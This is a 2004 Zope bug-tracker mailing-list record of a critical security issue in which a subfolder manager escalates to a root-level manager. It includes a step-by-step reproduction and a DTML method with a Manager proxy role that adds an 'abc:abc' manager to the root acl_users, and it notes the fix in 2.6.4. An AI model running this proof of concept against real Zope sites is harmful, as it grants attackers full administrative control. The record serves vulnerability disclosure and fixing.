[ZCM] [ZC] 977/ 4 Resolve "Manager in lower folder can create manager in higher folder "

Collector: Zope Bugs, Features, and Patches ... zope-coders-admin at zope.org
Tue Jan 20 09:21:07 EST 2004 

Issue #977 Update (Resolve) "Manager in lower folder can create manager in higher folder "
 ** Security Related ** (Public)
 Status Resolved, Zope/bug critical
To followup, visit:
  http://zope.org/Collectors/Zope/977

==============================================================
= Resolve - Entry #4 by Brian on Jan 20, 2004 9:21 am

 Status: Pending => Resolved

resolved in 2.6.4 / 2.7.0 rc1

-BL
________________________________________
= Resubmit - Entry #3 by mj on Dec 3, 2003 4:40 pm

 Status: Rejected => Pending

Damn, this should still be kept confidential. And an email just went out. Resubmitting to make it confidential again.
________________________________________
= Reject - Entry #2 by mj on Dec 3, 2003 4:26 pm

 Status: Pending => Rejected

This is a dupe of 743, although this bug has a better example of the risks. Closing this one for bug management simplicity.
________________________________________
= Request - Entry #1 by Anonymous User on Jul 17, 2003 8:30 am

Compare Bug 254, but now use dtml:

Basically, a user defined in 

  /subfolder/acl_users/trusted_user

with manager role, can use a dtml method with proxy roles to create a new user with manager role in the root acl_users folder.

Here's how to do it.

Stage 1: set up the environment.

1: take a fresh Zope 2.6.1

2: log in as the default admin user

3: create a folder in the root folder, called "subfolder". Check the box to create a user-folder in subfolder.

4: Create a user "trusted_user" in /subfolder/acl_users, with the role of Manager.

5: Log out as admin

Stage 2: trusted_user creates a manager in the root acl_users

1: log into /subfolder/manage as trusted_user

2: create a dtml method

3: edit it as following:

 <dtml-var standard_html_header>
  <h2><dtml-var document_title></h2>

  <dtml-let user="REQUEST['AUTHENTICATED_USER']">

  <dtml-call "REQUEST.set( 'name', 'abc')">
  <dtml-call "REQUEST.set( 'password', 'abc')">
  <dtml-call "REQUEST.set( 'confirm', 'abc')">
  <dtml-call "REQUEST.set( 'roles', user.getRoles() )">
  <dtml-call "REQUEST.set( 'domains', user.getDomains() )">
 
  <dtml-with "PARENTS[-1]">
  <dtml-call "acl_users.manage_users( 'Add', REQUEST )">
  </dtml-with>

 
 <p> hacked </p>

  </dtml-let>
  <dtml-var standard_html_footer>


4: Go to the proxy tab, and give it the Manager proxy role.

5: view the page. It will render Title and "hacked"

6: log out as trusted_user

Stage 3: abusing the new power

1: go to the url /manage. Log in as abc:abc

2: do bad stuff


==============================================================

More information about the Zope-Collector-Monitor mailing list